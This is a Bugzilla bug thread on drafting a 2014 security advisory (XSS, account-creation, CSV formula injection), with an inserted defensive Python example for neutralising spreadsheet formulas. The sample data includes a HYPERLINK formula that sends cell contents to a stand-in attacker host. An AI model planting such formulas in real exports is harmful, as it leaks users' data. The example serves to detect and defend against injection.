Closed Bug 1072497 Opened 10 years ago Closed 10 years ago

Security advisory for Bugzilla 4.5.6, 4.4.6, 4.2.11, and 4.0.15

Categories: Bugzilla :: Documentation (defect)
Version: 4.5.6
Priority: Not set
Severity: blocker
Status: RESOLVED FIXED
People: Reporter: dkl, Assigned: dkl
Attachments: 1 file, 6 obsolete files

One or more security fixes exists for Bugzilla 4.5.6, 4.4.6, 4.2.11, and 4.0.15 and will need a security advisory.
I assume you'll want CVE numbers for the two "depends on" bugs?
(In reply to Daniel Veditz [:dveditz] from comment #1)
> I assume you'll want CVE numbers for the two "depends on" bugs?

Yes please. Thanks!
Why is bug 1054702 tagged as a security bug? It's an issue in Excel/LibO/OO IMO, not a Bugzilla bug.
(In reply to Frédéric Buclin from comment #3)
> Why is bug 1054702 tagged as a security bug? It's an issue in Excel/LibO/OO
> IMO, not a Bugzilla bug.

I was just wondering the same thing. Dan/Curtis, thoughts?
Attached file sec_adv_4.0.14.txt (obsolete) —
Attachment #8497238 - Flags: review?(LpSolit)
Comment on attachment 8497238 [details]
sec_adv_4.0.14.txt

> field values can be intepreted as formulas which can be executed

interpreted

> CVE Number: CVE-2014-1571)

Extra ')'
(In reply to Reed Loden [:reed] from comment #6)
> Comment on attachment 8497238 [details]
> sec_adv_4.0.14.txt
>
> > field values can be intepreted as formulas which can be executed
>
> interpreted
>
> > CVE Number: CVE-2014-1571)
>
> Extra ')'

Thanks Reed. Changed in my local copy.
Depends on: CVE-2014-1572
(In reply to Daniel Veditz [:dveditz] from comment #1)
> I assume you'll want CVE numbers for the two "depends on" bugs?

Dan, we will also need a CVE for bug 1074812 I think.

dkl
(In reply to Reed Loden [:reed] from comment #4)
> (In reply to Frédéric Buclin from comment #3)
> > Why is bug 1054702 tagged as a security bug? It's an issue in Excel/LibO/OO
> > IMO, not a Bugzilla bug.
>
> I was just wondering the same thing. Dan/Curtis, thoughts?

As Dan says in comment 9 https://bugzilla.mozilla.org/show_bug.cgi?id=1054702#c9

"It doesn't matter whose bug it is, bugzilla is used by folks in environments with those very common programs and the combination can result in harm. That makes it a security bug."
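The harm discussed above is what is usually called CSV formula injection: a bug summary or other free-text field that begins with a character such as "=" is evaluated as a formula when the exported CSV is opened in Excel, LibreOffice Calc or OpenOffice. The following is an added, stand-alone illustration of the export-side mitigation and of a check that flags cells a spreadsheet would evaluate. It is not Bugzilla's own code (which is Perl) and not part of the advisory; the sample rows, the column names and the helper names (neutralize_cell, export_csv, unsafe_cells) are constructed for this example.

```python
import csv
import io

# Leading characters that make common spreadsheets treat a cell as a formula.
# '=' is the classic trigger; '+', '-' and '@' also start formulas in Excel,
# and a leading tab or carriage return is sometimes used to slip past naive
# "starts with =" checks.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def _looks_numeric(value):
    """True for plain numbers such as '-5' or '+3.25', which must stay numbers."""
    try:
        float(value)
        return True
    except ValueError:
        return False


def is_formula_cell(cell):
    """Would a spreadsheet evaluate this cell rather than display it as text?"""
    return (
        isinstance(cell, str)
        and cell.startswith(FORMULA_TRIGGERS)
        and not _looks_numeric(cell)
    )


def neutralize_cell(value):
    """Return value in a form that is displayed as text, not evaluated.

    A leading single quote is the usual text prefix; some tools show the
    quote when opening a CSV, which is cosmetic, while the cell is no longer
    evaluated. Numeric-looking values such as "-5" are left untouched.
    """
    if is_formula_cell(value):
        return "'" + value
    return value


def export_csv(rows, header, neutralize=True):
    """Write rows as CSV; neutralize=False reproduces the risky export."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(v) if neutralize else v for v in row])
    return buf.getvalue()


def unsafe_cells(csv_text):
    """Parse a CSV export back and list (row, column) of evaluable cells.

    Row 0 is the header line. Intended as a check on an export before it is
    handed to users who will open it in a spreadsheet.
    """
    reader = csv.reader(io.StringIO(csv_text))
    return [
        (r, c)
        for r, row in enumerate(reader)
        for c, cell in enumerate(row)
        if is_formula_cell(cell)
    ]


# Constructed sample data: bug summaries are attacker-controlled text.
SAMPLE_HEADER = ["bug_id", "summary", "reporter"]
SAMPLE_ROWS = [
    [1, "Crash on startup", "alice@example.com"],
    [2, '=HYPERLINK("http://attacker.example/?"&A1,"click")', "mallory@example.com"],
    [3, "-5 regressions since last week", "bob@example.com"],
    [4, "@home build fails", "carol@example.com"],
]

if __name__ == "__main__":
    risky = export_csv(SAMPLE_ROWS, SAMPLE_HEADER, neutralize=False)
    safe = export_csv(SAMPLE_ROWS, SAMPLE_HEADER)
    print("evaluable cells in risky export:", unsafe_cells(risky))
    print("evaluable cells in safe export:", unsafe_cells(safe))
    print(safe)
```

The check deliberately runs on the serialized CSV rather than on the in-memory rows, so it also catches cells that became evaluable through quoting or through a different code path than the one being hardened.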
For bug 1074812, please credit them as "Check Point Vulnerability Research", as per their request.
Attached file sec_adv_4.0.14_2.txt (obsolete) —
Attachment #8497238 - Attachment is obsolete: true
Attachment #8497238 - Flags: review?(LpSolit)
Attachment #8497722 - Flags: review?(LpSolit)
Comment on attachment 8497722 [details]
sec_adv_4.0.14_2.txt

> * The 'realname' parameter is not correctly filtered on user account
>   creation, leading to user data override.

This issue is by far the most critical of the three. That's why I would mention it first.

> Class: Social Engineering
> Versions: 3.7.1 to 4.0.14, 4.1.1 to 4.2.10, 4.3.1 to 4.4.5, 4.5.1 to 4.5.5

CSV export has been implemented in 2.17.1, see bug 12282.

> Class: Information Leak
> Versions: 3.7.1 to 4.0.14, 4.1.1 to 4.2.10, 4.3.1 to 4.4.5, 4.5.1 to 4.5.5

Same here, 2.17.1 and newer, see bug 179582.

> Class: Unauthorized Account Creation
> Versions: 2.23.3 to 3.4.14, 3.5.1 to 3.6.13, 3.7.1 to 4.0.14, 4.1.1 to 4.2.10,

As 3.x branches haven't been fixed (as they are now closed), you should write: 2.23.3 to 4.0.14, ...

> requested. The overridden login name could be automatically be added

s/be added/added/

> The fixes for these issues are included in the 4.0.14, 4.2.10, 4.4.5, and 4.5.5

Those are old versions.

> The Bugzilla team wish to thank the following people/organizations for
> their assistance in locating, advising us of, and assisting us in fixing
> these issues:
>
> Simon Green
> Byron Jones
> James Kettle
> Check Point Vulnerability Research

Please also credit Matt Tyson who helped with backports for bug 1064140, and LpSolit and dkl who fixed/reviewed bug 1074812.
Attachment #8497722 - Flags: review?(LpSolit) → review-
Depends on: CVE-2014-1573
(In reply to Frédéric Buclin from comment #12)
> Comment on attachment 8497722 [details]
> sec_adv_4.0.14_2.txt

Fixed all of these locally but holding off on new revision as it will be likely changing with the new fixes being included in this release.
Attached file sec_adv_4.0.14_3.txt (obsolete) —
Attachment #8497722 - Attachment is obsolete: true
Attachment #8498978 - Flags: review?(LpSolit)
The Check Point guys suggested to me that they'd like to coordinate on the advisory text. dkl: can you either CC them here, or make contact with them about that?

Gerv
> Vulnerability Solutions
> =======================
>
> The fixes for these issues are included in the 4.0.15, 4.2.11, 4.4.6, and4.5.6
> releases. Upgrading to a release with the relevant fixes will protect your
> installation from possible exploits of this issue.

Small nits, should the last sentence be "these issues" instead of "this issue" as there are more than one? Also need a space in the first sentence "and4.5.6".

Setting needinfo for :dkl for this and comment 15.
Flags: needinfo?(dkl)
Adding checkpoint people to the cc list so they can see the advisory to be sent out on Monday.
Flags: needinfo?(dkl)
Attached file sec_adv_4.0.14_4.txt (obsolete) —
Minor updates.
Attachment #8498978 - Attachment is obsolete: true
Attachment #8498978 - Flags: review?(LpSolit)
Attachment #8499567 - Flags: review?(LpSolit)
Comment on attachment 8499567 [details]
sec_adv_4.0.14_4.txt

> Bugzilla is a Web-based bug-tracking system used by a large number of
> software projects. The following security issue has been discovered
> in Bugzilla:

s/issue has/issues have/

> * Places were found in the Bugzilla code where cross-site scripting
>   attacks could be used to access sensitive information.

s/Places/Several places/ maybe?

> * The 'realname' parameter is not correctly filtered on user account
>   creation, leading to user data override.

s/leading to/which could lead to/

> Class: Cross-Site Scripting
> Versions: 2.23.3 to 4.0.14, 4.1.1 to 4.2.10, 4.3.1 to 4.4.5, 4.5.1 to 4.5.5

AFAICT, all versions of Bugzilla are affected. I just tested with a Bugzilla 2.22.7 installation, and I can reproduce some of the XSS issues.

> Description: During a recent audit of the Bugzilla code base, several places
>   where found where cross-site scripting exploits could occur which

s/where found/were found/
Attachment #8499567 - Flags: review?(LpSolit) → review-
Attached file sec_adv_4.0.14_5.txt (obsolete) —
Thanks for the review.
Attachment #8499567 - Attachment is obsolete: true
Attachment #8500086 - Flags: review?(LpSolit)
Comment on attachment 8500086 [details] sec_adv_4.0.14_5.txt r=LpSolit
Attachment #8500086 - Flags: review?(LpSolit) → review+
Attached file sec_adv_4.0.14.txt (obsolete) —
Changes based on email requests from Shahar Tal of Checkpoint Software. The suggestions made sense so I decided to incorporate where I could. Please review this version asap.

-- Email --

Hi David,

First, let me thank you for handling the vulnerability report in a professional manner, I wish all project owners were as focused and responsive as you guys.

I've got a couple of comments regarding the advisory text (as a research group this public attribution is important to us both internally and externally, hence the attention to detail),

1. We reconsidered our credit phrasing, please make sure to credit "Netanel Rubin of Check Point Vulnerability Research".

2. I know that the XSS bugs were found by Bugzilla developers, however if I understand correctly this audit was triggered by our report – this is not reflected by the text. It would be appropriate to mention that.

3. Similarly, the CVE number is mentioned as assigned to the XSS bugs, however you did assign it to the user account creation bug as well. It would be best if you decided to separate the issues into different CVE numbers, but if you choose not to, please mention the CVE number for our reported bug as well. (we count CVEs as yearly goals, so you can understand my request)

4. I find the account creation bug more severe than the XSSs, would you be kind as to making that the first item in the list? (again, I wouldn't ask if this wasn't helpful for us)

Thanks so much for your time,
Let me know if you have an issue with any of the above or if you need anything else,

Shahar Tal
Vulnerability Research
Check Point Software Technologies | +972-3-753-4536 | M +972-545-888887 | shahartal@checkpoint.com
Attachment #8500086 - Attachment is obsolete: true
Attachment #8500201 - Flags: review?(LpSolit)
> CVS/bzr

We _really_ need to convert the website to tell people about git.

Gerv
(In reply to Gervase Markham [:gerv] from comment #23)
> We _really_ need to convert the website to tell people about git.

Not yet. It was decided several months ago to mention git only once 5.0 was released.
Attached file sec_adv_4.0.14.txt
changed CVEs for original report and XSS report.
Attachment #8500201 - Attachment is obsolete: true
Attachment #8500201 - Flags: review?(LpSolit)
Attachment #8500534 - Flags: review?(LpSolit)
Sec advisory pushed to website and emailed to:

bugtraq
announce@bugzilla.org
support-bugzilla@lists.mozilla.org

dkl
Status: ASSIGNED → RESOLVED
Closed: 10 years ago
Resolution: --- → FIXED
Group: bugzilla-security
Attachment #8500534 - Flags: review?(LpSolit)